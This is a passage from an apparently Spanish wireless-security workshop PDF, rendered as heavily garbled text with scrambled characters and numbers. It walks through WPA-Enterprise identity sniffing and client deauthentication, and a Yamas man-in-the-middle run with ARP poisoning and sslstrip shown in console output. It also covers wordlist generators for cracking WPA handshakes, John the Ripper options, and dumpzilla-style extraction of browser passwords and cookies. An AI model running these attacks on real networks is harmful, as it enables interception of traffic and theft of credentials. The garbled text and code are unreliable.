 ;8*7*8*0K*37*83 -77 96 43 0 6 54e. $+2 M+ MP(iuscc;8*7*8*0K*37*80 -67 107 6 0 6 54e. $+2 M+ MP

edur!am00*0K*86*6*5&*53 -82 31 0 0 1 54 . $+2 M+ MP (iusc

 00*0K*86*6*5&*51 -81 24 0 0 1 54 . :+/ (iusc;8*7*8*34*77*01 -80 53 5 0 11 54e. :+/ (iusc;8*7*8*34*77*00 -81 51 0 0 11 54e. $+2 M+ MP

edur!am;8*7*8*34*77*02 -80 48 0 0 11 54e. $+2 M+ MP

(iusc00*0K*86*6*45*90 -81 37 24 0 1 54 . $+2 M+ MP

edur!am00*0K*86*6*45*93 -81 32 0 0 1 54 . $+2 M+ MP (iusc

 00*0K*86*6*5&*50 -82 28 11 0 1 54 . $+2 M+ MPedur!am00*0K*86*6*45*91 -81 34 17 0 1 54 . :+/ (iusc;8*7*8*0K*39*0 -83 43 2 0 1 54e. $+2 M+ MP

edur!am;8*7*8*0K*39*1 -84 42 77 1 1 54e. :+/ (iusc;8*7*8*0K*39*3 -84 44 0 0 1 54e. $+2 M+ MP

(iusc24*;*6*80*;;*40 -85 34 0 0 6 54e. $+2 M+ MP

edur!am24*;*6*80*;;*41 -86 36 34 0 6 54e. :+/ (iusc00*0*6*K2*8*76 -86 9 0 0 6 54e. $+2 M+ + mmedia

 24*;*6*80*;;*42 -83 33 4 0 6 54e. $+2 M+ MP(iuscc00*0*6*8*3K*53 -86 8 0 0 6 54e. $+2 M+ + ula-Ma

 00*0*6*&*1*;6 -87 5 0 0 6 54e. $+2 M+ + invitad00*0*6*;8*4* -87 10 0 0 6 54e. $+2 M+ + ces#a

c24*;*6*80*;8*;1 -127 94 550 4 11 54e. :+/ (iusc

------------------------------------------------------------------------------FJN +lease enter the K%; "r!m ab!ve "!r the access !int !" interest

Hn!t %;= i.e @00******@

------------------------------------------------------------------------------

/!s edira ue metam!s el K%; del + ue n!s interesas buen! esc!#er al#un! ue ten#a bastantes! c!iam!s de l!s de arriba , l! e#am!s aba! , ulsam!s nter/!s re#unta el anal. ! !nem!s , le dam!s a nter

24*;*6*80*;8*;2-------------------------------------------------------------------------------FJN +lease enter the channel number !" !" the access !int !" interest i.e 6

-------------------------------------------------------------------------------

76

Page 77: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 77/260

11

F-N % (ill n!( run a back#r!und r!cess t! ass!icate (ith this access !int...

F-N /!( sniSn# traSc l!!kin# "!r + ackets..

F-N /!te this can take s!me time as it deends !n ndin# + traSc andusers authenticatin#.

F-N eave scrit runnin# and users (ill aear i" the, authenticateC R t!cancel

--------------------------------------------------------------------------------FQN aturin# raScC ress R !nce ,!u have seen suScent usernames--------------------------------------------------------------------------------

%dentit,* an!n,m!usUusc.es%dentit,* an!n,m!usUusc.es%dentit,* an!n,m!usUusc.es

 7ora empie3a a esniar + los usuarios apareceran si se autentiican.%ara 5ue sea mas eectivo es bueno desautenticar al cliente para 5ue sereconecte al ap.%ara ello podemos 7acerlo usando aircrac/ pero tenemos 5ue 7acerlo desdeotro pc por5ue si abrimos otra 7erramienta 5ue use la interace nos cerrara

wE%e&na ve3 capturemos los 5ue 5ueremos pulsamos CtrlhC para salir.

 AMASEs otra 7erramienta para ata5ues ,an in t7e middle 8,I1,9 o 7ombre en elmedio."o 5ue nos aparece al iniciarlo es lo siguiente

Y,,V ,,V db M,,,. ),,V db .,@@@bgdB, )B L,, ,,,b d%,, L,, ),I @Y

B, )B )B,,. , Y, ), ,, )B,,. ,,b.B,,% ), ,, , ,b ,V ,, ), ,, Y,,N5.,, bmmm5, , Y,.%V ,, bmmm5, . ,,,, V B," , Y,V ,, V B," ,b d,

.O,,"..,. .,,..O,". V .O,,"..,. .,,.%@Ybmmd@[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[ $elcome to Yet not7er ,I1, utomation 'cript. [[ &se t7is tool responsibl+) and enjo+P [[ eel ree to contribute and distribute t7is script as +ou please. [

77

Page 78: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 78/260

[ >icial t7read 7ttp??tin+url.com?+amas-btA  [[ C7ec/ out t7e 7elp 8-79 to see new eatures and inormations [[ You are running version <0=D0D=D [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[

[[[[[[[[[[[[[[[[[,ensaje del dia

No se mostrara ningun mensaje esta en modo silencioso

_h` "impiando iptables_-` "impiado.

_h` ctivando I% orwarding..._-` ctivado.

_h` Conigurando iptables...

acia 5ue puerto debe ser redirigido el traicoS 8por deecto [ ;0;09;0;0!esde 5ue puerto debe ser redirigido el traicoS 8por deecto [ ;09

;0

El traico del puerto ;0 se redirige al puerto ;0;0_-` 1raic rerouted

_h` ctivating sslstrip...Elija el nombre del arc7ivo 8%or deecto [ +amas9

'slstrip escuc7a en el puerto ;0;0 + se guarda el log en ?tmp?+amas.t#t

sslstrip 0.F b+ ,o#ie ,arlinspi/e running...

_-` 'slstrip esta ejecutandose.

_h` ctivando R% envenenamiento de cac7e...

%uerta de enlace =M<.<=.=.= Interace wlan0

Escriba la direccion I% de la puerta de enlace o pulse Intro para utili3ar =M<.<=.=.=.

=M<.<=.=.= seleccionado como predeterminado.

78

Page 79: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 79/260

 

Que intera3 le gustaria usarS !ebe coincidir con puerta de enlace I% comose muestra arriba. %ulse Intro para usar wlan0.

wlan0 seleccionado como predeterminado.

Nos concentraremos en toda la red de orma predeterminada. &sted puede!escubrir 7osts e introducir I%8s9 de orma manual !..%ulsa IN1R> para elegir por deecto.

"an3ando sobre toda la red en =M<.<=.=.= desde wlan0 con R%spoo

_-` R% envenenamiento de cac7e se 7a ejecutado. !eja la8s9 nueva8s9ventana8s9 ejecutandose.

El ata5ue deber2a estar ejecutandose dentro de poco) disruta.

El ata5ue se esta ejecutando. %uede =. Reanali3ar la red.<. adir objetivo 8Inutil si es sobre toda la red9.D. !ispla+ 'CII correspondence table.4. Real-time parsing...A. ,isc eatures.. Quit properl+.

Introdu3ca el numero de la opcion deseada.

%ara usar la 7erramienta necesitamos < interaces de red.&na de ellas debe estar conectada a internet) la otra debe ser inalambrica +estar libre para crear el % also si no nos dará un error.

'i sólo tenemos una intera3 inalámbrica sólo tenemos < opciones=- Comprar un adaptador wii usb. &na interace la conectamos a internet +en la otra creamos el % also.<- Conectarnos a internet por cable de red o modem D* + usar la interaceinalámbrica para crear el % also.!ebemos de estar conectados a internet + la victima conectada a nosotrosde la si5uiente ormainternet - nuestro pc - pc victima

79

Page 80: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 80/260

Page 81: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 81/260

-s ---- !esired spacing c7aracter 8- ? . etc. some ma+ need escaping wit7bac/slas7 9

 lternative optionsL

- --- ppend numeric values to an e#isting wordlist 8no ot7er switc7esre5uired9-% --- %repend numeric values to an e#isting wordlist 8no ot7er switc7esre5uired9-v --- Bersion W more detailed inormation on usage-7 --- 17is 7elp inormation

E#ample datelist -b =F00-0=-0= -e <0A0-=<-D= - ddmm++++ -odateTwordlist.t#t -s -

datelist -b =F00-0=-0= -e <000-=<-D= - ++mmdd -o dateTwordlist.t#t -p

1E'1

wiisla# k

G9!criptDIC'cript 5ue para pasar 4 diccionarios +a creados sobre los 7ands7a/ecapturados con *o+script $%.

Caracteristicas de la 7erramienta + lista de cambios- 'elecciona uno o mas de los 7ands7a/es capturados por go+script$% uotra 7eramienta.- 'elecciona uno o más de los diccionarios disponibles 8.dic o .s7 al vuelo9.- En el men: de selección de diccionarios se indica cuántas contraseastiene cada uno- 'e muestran de morado los 7ands7a/es de los 5ue +a se 7a obtenido la

contrasea.- adido parámetro para poder iltrar la b:s5ueda de 7ands7a/es- adido diccionario al vuelo para redes de R 8*alicia9- adido diccionario al vuelo para redes de >range 8son más de <00millones de posibles contraseas) as2 5ue 7e aadido guardado de sesiónautomáticamente para poder continuar en cual5uier momento9. !ic7odiccionario está basado en el algoritmo del script >range.s7 creado por =camaron= 8colaboración de /cdtv9 + publicado en7ttp??lampiweb.com?oro?inde#.p7pStopic[FF=D.0 - 'e puede usar p+rit

81

Page 82: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 82/260

- 'e guarda un registro de los diccionarios pasados 8completamente9 a cada7ands7a/e.'i se intenta volver a pasar el mismo diccionario al mismo 7ands7a/e elscript lo detecta + lo omite.

- 'e indica si el proceso de pasar el diccionario 7a sido cancelado.- 'e indica la 7ora a la 5ue se comien3a a pasar un diccionario + se muestraun cronómetro para cada uno de ellos.- adido soporte para Oo7n t7e Ripper 8guarda las sesiones en@wpa?sesiones@9. 'i deseamos cancelar el proceso de pasar el diccionario) esimprescindible 5ue lo 7agamos pulsando C>N1R>"hC + esperemos a 5uese cierre la ventana. !e lo contrario la sesión no se guardará.1raducido al espaol e integrado en $iisla#.- Reescritos los diccionarios por script para generarlos con crunc7 8másrápido de bas79

- adidas =.000.000 de contraseas más para el diccionario ,undo-R.s7- adida la posibilidad de generar un diccionario personali3adoautomáticamente para redes$% con un patrón de contrasea conocido- 7ora se comprueba al inicio si el dispositivo de almacenamiento es de sólolectura- 7ora se pueden usar diccionarios con e#tensión .t#t 8en la carpeta @dic@9- 'e comprueba si se tienen permisos de root para poder ejecutar el script

&so de la 7erramienta&na ve3 elegido el o los 7ands7a/es nos muestra el men: donde podremoselegir 5u6 diccionario vamos a utili3ar.%odemos seleccionar) uno) varios o todos los diccionarios a pasar) cuando lo7a+amos 7ec7o ponemos G0H + comen3ara a pasar los diccionarios uno trasotro.

*>Yscript!IC D.4-betaA b+ *>Yilms

q

!istribución de linu# detectada $iisla#

'e 7an encontrado == diccionarios pero no 7a+ 7ands7a/es.

%ulsa una tecla para salir...

82

Page 83: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 83/260

Como vemos para usarlo previamente 7a+ 5ue capturar alg:n 7ands7a/econ *>Yscript $% para luego selecionar uno de los dicionarios disponiblespara pasar.

generadorDiccio+p'cript p+t7on para generar dicionarios.

 l abrir primer acceso directo nos abre el arc7ivo en el editor 'ci1E para 5uelo podamos modiicar a nuestro antojo

P?usr?bin?p+t7on Invasion 1u# &ltima modiicacion miercoles) =4 de enero de <00F 'cript reali3ado por ma/iolo 8ma/iolofgmail.com9 8"icencia Creative

Commons con reconocimiento9 &ltima version 7ttp??blogricardo.wordpress.com?<00;?=<?<;?script-para-generar-diccionarios-de-uer3a-bruta?  !ependencias p+t7on

import s+s) mat7rom time import time) localtime) strtime

C>NI*&RCI>N

">N*I1&! [ ; "(E1> [ @abcdeg7ij/lmnop5rstuvw#+30=<D4AM;FT-.@

&NCI>NE'

de getBariacionesConRepeticion8"(E1> ) ">N*I1&!9sumatorio [ 0or i in range8">N*I1&!9producto [ =or j in range8ih=9producto [ producto len8"(E1>9

sumatorio [ sumatorio h productoreturn sumatorio

83

Page 84: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 84/260

de evento%alabra*enerada8palabra9print palabra

BR' &KI"IRE'!E(&* [ 1rueBER(>'E [ 1ruevariacionesConRepeticion [ getBariacionesConRepeticion8"(E1> )">N*I1&!9inicioReloj [ time89cont [ 0

progreso [ 0

w7ile ">N*I1&! ^ 0tr+

contadores [ _` ponemos los contadoresa 0

or i in range8">N*I1&!9contadores.append809

in [ alsew7ile not ini !E(&* [[ 1ruepalabra[_` Creas una lista vacia

8+ liberas de paso9or i in range8">N*I1&!9palabra.append8"(E1>_contadores_i``9 Bas

metiendo al inal letra a letra

evento%alabra*enerada8@@.join8palabra99 Envias atu callbac/ tada la lista unida

i BER(>'E [[ 1ruei 8cont 00000 [[ 09 and 8cont P[ 09

progreso [ cont=00.0?variacionesConRepeticion porcentaje 7asta a7ora

progreso [ round8progreso ) <9inReloj [ time89 - inicioReloj inReloj es lo 5ue

esta tardando el calculo

84

Page 85: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 85/260

  velocidad [ cont ? inReloj palabras procesadaspor segundo

velocidad [ round8velocidad ) <9estimado [ inReloj variacionesConRepeticion ? cont es lo 5ue

se estima en reali3ar todo el procesorestante [ estimado - inReloj es lo 5ue se estimaen reali3ar lo restante

restante [ restante ? 0 ? 0 lo pasamos a 7orasrestante [ round8restante ) <9s+s.stderr.write8str8progreso9h@ - Quedan @hstr8restante9h@ 7oras. "a

velocidad es de @hstr8velocidad9h@ palabras?segn@9

cont [ cont h =actual [ ">N*I1&! - = %ongo actual a la

derec7a del todocontadores_actual` [ contadores_actual` h = 'umo = a lasunidades

w7ile8contadores_actual` [[ len8"(E1>99 and not in %ropago el carr+

i8actual [[ 09in [ 1rue IN

elsecontadores_actual` [ 0 reinicia el actual

contadoractual [ actual - = avan3a a la i35uierdacontadores_actual` [ contadores_actual` h = + le sumo =

">N*I1&! [ ">N*I1&! - = combinacionespara uno menos

e#cept e+boardInterrupts+s.stderr.write8@Interrumpido por el usuarion@9

in [ 1rue uer3o las condiciones desalida">N*I1&! [ 0

i BER(>'E [[ 1rues+s.stderr.write8@1erminado al @hstr8progreso9h@ - Reali3adas @hstr8cont9h@

combinaciones de @hstr8variacionesConRepeticion9h@n@9

 l abrir segunto acceso directo ejecuta el script) abre el terminal + aparece losiguiente

85

Page 86: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 86/260

0.0 - Quedan =<4D0.=A 7oras. "a velocidad es de =<<M4F.<4 palabras?seg0.0 - Quedan =<440.A= 7oras. "a velocidad es de =<<4M.0M palabras?seg0.0 - Quedan =<44A.=D 7oras. "a velocidad es de =<<0=.A palabras?seg0.0 - Quedan =<44<.44 7oras. "a velocidad es de =<<<M.FA palabras?seg

0.0 - Quedan =<4DD.<F 7oras. "a velocidad es de =<<M=;.< palabras?seg0.0 - Quedan =<4D<.= 7oras. "a velocidad es de =<<M<4.FM palabras?seg0.0 - Quedan =<4D0.;F 7oras. "a velocidad es de =<<M4=.F< palabras?seg0.0 - Quedan =<4<;.=4 7oras. "a velocidad es de =<<MF.0< palabras?seg0.0 - Quedan =<4<A.M= 7oras. "a velocidad es de =<<MFD.0A palabras?seg0.0 - Quedan =<4<A.A 7oras. "a velocidad es de =<<MFA.0A palabras?segCInterrumpido por el usuario1erminado al 0.0 - Reali3adas =D<;DA combinaciones de A4F<;A=0F440

El programa generara el diccionario con los parametros 5ue le pusimos en el

script.

Giga .ordli!t Creator-------------------------------------------kkkkkkkkkk *iga $ordlist Creator kkkkkkkkkk------------------------------------------------------k utomatic creation k--------------k > an optimi3ed dictionar+ ile k---------------k or $% Crac/ing k-----------------k !eveloped or (ac/trac/ D inal k-------------------------------------------------- (roug7t to +ou b+ ,=c/D+ W ,=r4gD ----------------- www.crac/-wpa.r   -------------------------------------------------------

--^ %lease enter +our c7oice

--^ 8ollow t7e steps in orderP9

--^ = ,erge all +our wordlists iles--^ < ,odi+ t7e dictionar+ wit7 Oo7n 17e Ripper--^ D >ptimi3e t7e dictionar+ or $% crac/ing--^ 4 'ort and remove duplicates

--^ Your c7oice8Elegimos la opcion 5ue 5ueramos9

ohn The Ripper

86

Page 87: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 87/260

 - Oo7n t7e Ripper password crac/er- Cop+rig7t 8c9 =FF-<0== b+ 'olar !esigner and ot7ers- omepage 7ttp??www.openwall.com?jo7n? 

- &sage jo7n _>%1I>N'` _%''$>R!-I"E'`

Escribe jo7n + presiona enter para ver las opciones $rite jo7n and press enter to see options

wiisla# k jo7nCreated director+ ?root?.jo7nOo7n t7e Ripper password crac/er) version =.;.0Cop+rig7t 8c9 =FF-<0=D b+ 'olar !esigner

omepage 7ttp??www.openwall.com?jo7n? 

&sage jo7n _>%1I>N'` _%''$>R!-I"E'`--single @single crac/@ mode--wordlist[I"E --stdin wordlist mode) read words rom I"E or stdin--rules enable word mangling rules or wordlist mode--incremental_[,>!E` @incremental@ mode _using section ,>!E`--e#ternal[,>!E e#ternal mode or word ilter--stdout_["EN*1` just output candidate passwords _cut at "EN*1`--restore_[N,E` restore an interrupted session _called N,E`--session[N,E give a new session t7e N,E--status_[N,E` print status o a session _called N,E`--ma/e-c7arset[I"E ma/e a c7arset) I"E will be overwritten--s7ow s7ow crac/ed passwords--test_[1I,E` run tests and benc7mar/s or 1I,E seconds eac7--users[_-`">*IN&I!_)..` _do not` load t7is 8t7ese9 user8s9 onl+--groups[_-`*I!_).. load users _not` o t7is 8t7ese9 group8s9 onl+--s7ells[_-`'E""_)..` load users wit7_out` t7is 8t7ese9 s7ell8s9 onl+--salts[_-`N load salts wit7_out` at least N passwords onl+

--save-memor+["EBE" enable memor+ saving) at "EBE" =..D--node[,IN_-,K`?1>1" t7is nodeVs number range out o 1>1" count--or/[N or/ N processes--ormat[N,E orce 7as7 t+pe N,E descr+pt?bsdicr+pt?mdAcr+pt?

bcr+pt?",?'?tripcode?dumm+

onnherramienta para crear reali3ar ata5ues de uer3a ruta con diccionarios.

87

Page 88: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 88/260

Ma!7proce!!or *eneración de dicionarios de alto rendimiento conigurable.

mas/processor b+ atom) ig7-%erormance word generator wit7 per-positionconigureable c7arset

&sage mas/processor _options`... mas/

'tartup

-B) --version %rint version-7) --7elp %rint 7elp

Increment

-i) --increment Enable increment mode--increment-min[N&, 'tart incrementing at N&,--increment-ma#[N&, 'top incrementing at N&,

,isc

--7e#-c7arset ssume c7arset is given in 7e#

Resources

88

Page 89: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 89/260

  -s) --start-at[$>R! 'tart at speciic position-l) --stop-at[$>R! 'top at speciic position

iles

-o) --output-ile[I"E >utput-ile

Custom c7arsets

-=) --custom-c7arset=[C' &ser-deineable c7arsets-<) --custom-c7arset<[C' E#ample-D) --custom-c7arsetD[C' --custom-c7arset=[Sdabcde-4) --custom-c7arset4[C' sets c7arset S= to 0=<D4AM;Fabcde

(uilt-in c7arsets

Sl [ abcdeg7ij/lmnop5rstuvw#+3Su [ (C!E*IO",N>%QR'1&B$KYSd [ 0=<D4AM;FSs [ P@WV89h)-.?L][^Sf_`TkS7 [ ; bit c7aracters rom 0#c0 - 0#S! [ ; bit c7aracters rom german alp7abetS [ ; bit c7aracters rom renc7 alp7abetSR [ ; bit c7aracters rom russian alp7abet

wiisla# mas/processor

,utator v0.< b+ floneIn17e'7ell email]alone.in.t7e.s7ellfgmail.com^

'+nta# mutator _options` wordlist

>ptions-v) --version '7ow version inormation

-7) --7elp '7ow t7is 7elp-o) --output _ile` ile to write t7e results-) --ile _ile` ile rom read t7e words-w) --word _word` $ord to mutate-b) --basic >nl+ @case@ and @lDDt@ mutations-a) --advanced >nl+ advanced mutations-+) --+ears _+ear` No append)prepend +ear) i a +ear is speciied

appendrange between +ear speciied and actual +ear-#) --specials No append specials c7ars-s) --strings No append)prepend 7ardcoded strings

89

Page 90: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 90/260

>ne o t7ese options -w or - is re5uired

4.In!pector 

%$-Inspector v0.< 8c9 <00A b+ van auser ? 1C v7ft7c.org_7ttp??www.t7c.org`

'+nta# pw-inspector _-i I"E` _-o I"E` _-m ,IN"EN` _-, ,K"EN` _-c,IN'E1'` -l -u -n -p -s

>ptions-i I"E ile to read passwords rom 8deault stdin9-o I"E ile to write valid passwords to 8deault stdout9-m ,IN"EN minimum lengt7 o a valid password

-, ,K"EN ma#imum lengt7 o a valid password-c ,IN'E1' t7e minimum number o sets re5uired 8deault all given9'ets-l lowcase c7aracters 8a)b)c)d) etc.9-u upcase c7aracters 8)()C)!) etc.9-n numbers 8=)<)D)4) etc.9-p printable c7aracters 8w7ic7 are not -l?-n?-p) e.g. )P)?)8)) etc.9-s special c7aracters - all ot7ers not wit7int t7e sets above

%$-Inspector reads passwords in and prints t7ose w7ic7 meet t7ere5uirements.17e return code is t7e number o valid passwords ound) 0 i none was ound.&se or securit+ c7ec/ passwords) i 0 is returned) reject password c7oice.&se or 7ac/ing trim +our dictionar+ ile to t7e pw re5uirements o t7e target.&sage onl+ allowed or legal purposes.

[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[['trin*enenator v=.D b+ lui!

[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[

=.- !ic. letras minusculas.<.- !ic. letras ,Y&'C&"'.D.- !ic. letras minusculas + numeros.4.- !ic. letras ,Y&'C&"' + numeros.A.- !ic. numeros..- !ic. numeros desde... 7asta...M.- !ic. EK.;.- !ic. EK aleatorios.F.- !ic. con string + letras minusculas.=0.- !ic. con string + letras ,Y&'C&"'.

90

Page 91: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 91/260

 ==.- !ic. con string + numeros.=<.- !ic. con string) letras minusculas + numeros.=D.- !ic. con string) letras ,Y&'C&"' + numeros.=4.- !ic. a medida.

=A.- !ic. a medida por volumenes.=.- iltrar palabras en arc7ivo de te#to.=M.- Conversor arc7ivos ,a+usculas?,inusculas.---------------------------------------------------p.-%reijo N?.s.-'uijo N?.[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[>pcion

.G;Crac7

$*4Crac/ v=.= -b+ CoemanM- www.lampiweb.com 8<0=49

&so "inu# .?$*4Crac/ _C7arset` _"ongitud` _>pciones`

>pciones !isponibles

-r N\ ma#imo de repeticiones de un caracter de orma consecutiva.,a# A 8'i es = no aanm/i 9

-o N\ ma#imo de ocurrencias de un caracter en la palabra. ,a# 4 8sies < no abacal/9

-p N\ ma#imo de parejas de caracteres. ,a# < 8'i es = no ababcgt9-i Cadena de Inicio 8"a cadena no interactuara con las reducciones9- Nombre de arc7ivo donde guardar el diccionario 8'in e#tension9

Ej. de uso .?$*4Crac/ 0=<D4AM;F =0 -r = -o < -i F -p = ---^ *eneraraprimera e+ F0=0<=<D4D

V VV V V V V V VV V V V V V V 0 W X 0 VV VV VVXXXX VV V b+ arnaugame3 --------------------------------------------------

Elimina de un diccionario las palabras de menos de ; caracteres.

91

Page 92: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 92/260

'oporta ormato .t#t) .lst + .dic

Nombre diccionario entrada 8con e#tension9

$g&'*E perl ?bin?wg.pl optionsoptions are-a string prei#-c number ma# consecutive letters 87ow man+ consecutive VaV do +ou wantS9-e submit t7e output string to t7e operating s+stem-7 7elp-l number min lengt7 o t7e word-o number ma# number o occurrencies o a letter-n number ma# number o n-ple 8) ((() CCC) !!!!9

-r number ma# number o repeatitions 8(C(((C!(C! 7as Arepeatitions D reps o ( and < o (C!9-t trace on-u number ma# lengt7 o t7e word-v string list o valid c7aracters 8es) @0=@ @abcde@9-w ilename-3 string posti#

possible return code are0) o/=) not all parameters<) min lengt7 8-l9 is greater t7an ma# leng7t 8-u9D) at least one parameter is lower t7an =Return code =

/oren!e!erramientas orenses para recuperar arc7ivos) datos) metadatos) coo/ies)sesiones) passwords) etc

Bul7e'tractor  erramienta para e#traer un arc7ivo de imagen de sistema.

 l iniciarlo vemos todas las opciones disponiblesbul/Te#tractor version =.D.= Rev =0;4A &sage bul/Te#tractor _options` imageile

runs bul/ e#tractor and outputs to stdout a summar+ o w7at was oundw7ere

Re5uired parameters

92

Page 93: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 93/260

  imageile - t7e ile to e#tractor -R iledir - recurse t7roug7 a director+ o iles-o outdir - speciies output director+. ,ust not e#ist.

bul/Te#tractor creates t7is director+.

>ptions-b banner.t#t- dd banner.t#t contents to t7e top o ever+ output ile.-r alertTlist.t#t - a ile containing t7e alert list o eatures to alert

8can be a eature ile or a list o globs98can be repeated.9

-w stopTlist.t#t - a ile containing t7e stop list o eatures 8w7ite list8can be a eature ile or a list o globs9s8can be repeated.9

- ]rile^ - Read a list o regular e#pressions rom ]rile^ to ind- ]rege#^ - ind occurrences o ]rege#^L ma+ be repeated.

results go into ind.t#t-5 nn - Quiet RateL onl+ print ever+ nn status reports. !eault 0L -= or no status at all

1uning parameters-C NN - speciies t7e si3e o t7e conte#t window 8deault =9-* NN - speci+ t7e page si3e 8deault =MMM<=9-g NN - speci+ margin 8deault 4=F4D049-$ n=n< - 'peciies minimum and ma#imum word si3e

8deault is -w=49-( NN - 'peci+ t7e bloc/si3e or bul/ data anal+sis 8deault A=<9-j NN - Number o anal+sis t7reads to run 8deault <9-, nn - sets ma# recursion dept7 8deault A9

%at7 %rocessing ,ode-p ]pat7^? - print t7e value o ]pat7^ wit7 a given ormat.

ormats r [ rawL 7 [ 7e#.'peci+ -p - or interactive mode.'peci+ -p -7ttp or 11% mode.

%aralleli3ing-Y ]o=^ - 'tart processing at o= 8o= ma+ be =) =) =, or =*9-Y ]o=^-]o<^ - %rocess o=-o<- ]o^ - dd ]o^ to all reported eature osets

!ebugging-7 - print t7is message- - print detailed ino on t7e scanners-B - print version number

93

Page 94: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 94/260

  -3 nn - start on page nn-dN - debug mode 8see source code- - 3ap 8erase9 output director+

Control o 'canners-% ]dir^ - 'peciies a plugin director+-E scanner - turn o all scanners e#cept scanner-m ]ma#^ - ma#imum number o minutes to wait or memor+ starvation

deault is 0-s name[value - sets a bul/ e#tractor option name to be value

-e bul/ - enable scanner bul/-e wordlist - enable scanner wordlist

-# accts - disable scanner accts-# aes - disable scanner aes-# base= - disable scanner base=-# base4 - disable scanner base4-# el - disable scanner el-# email - disable scanner email-# e#i - disable scanner e#i-# gps - disable scanner gps-# g3ip - disable scanner g3ip-# 7iber - disable scanner 7iber-# json - disable scanner json-# /ml - disable scanner /ml-# net - disable scanner net-# pd - disable scanner pd-# vcard - disable scanner vcard-# windirs - disable scanner windirs-# winpe - disable scanner winpe-# winpreetc7 - disable scanner winpreetc7-# 3ip - disable scanner 3ip

dumpKilla'cript para e#traer todos los datos guardados de mo3illa como coo/ies)permisos) descargas) 7istorial) cac7eoline) t7umbnails) passwords)sesiones) etc

 l iniciarlo vemos todas las opciones disponiblesBersion =A?0D?<0=D

&sage p+t7on dump3illa.p+ browserTproileTdirector+ _>ptions`

94

Page 95: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 95/260

>ptions

--ll 8'7ows ever+t7ing but t7e !>, data. !oesnVt e#tract t7umbnails or 

1," A oline9--Coo/ies _-s7owdom -domain ]string^ -name ]string^ -7ostcoo/ie ]string^-access ]date^ -create ]date^ -secure ]0?=^ -7ttponl+ ]0?=^ -rangeTlast-rangeTcreate ]start^ ]end^`--%ermissions _-7ost ]string^`--!ownloads _-range ]start^ ]end^`--orms _-value ]string^ -rangeTorms ]start^ ]end^`--istor+ _-url ]string^ -title ]string^ -date ]date^ -rangeT7istor+ ]start^

]end^ -re5uenc+`--(oo/mar/s _-rangeTboo/mar/s ]start^ ]end^`

--Cac7eoline _-rangeTcac7eo ]start^ ]end^ -e#tract ]director+^`--17umbnails _-e#tractTt7umb ]director+^`--Range ]start date^ ]end date^--ddons--%asswords 8!ecode onl+ in &ni#9--Certoverride--'ession--$atc7 _-te#t ]string^` 8'7ows in daemon mode t7e &R"s and te#t orm in

real time. -te#tV >ption allow ilter) support all grep $ildcards. E#it Ctrl h C.onl+ &ni#9.

$ildcards VV n+ string o an+ lengt7 8Including 3ero lengt79VTV 'ingle c7aracterVV Escape c7aracter

!ate s+nta# YYYY-,,-!! ,,''

$in proile VC!ocuments and 'ettings##pplication!ata,o3illaireo#%roiles####.deaultV

&ni# proile V?7ome?##?.mo3illa?seamon/e+?####.deault?V

Grampu!Es un programa para e#traer metadatos de arc7ivos"o abrimos

95

Page 96: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 96/260

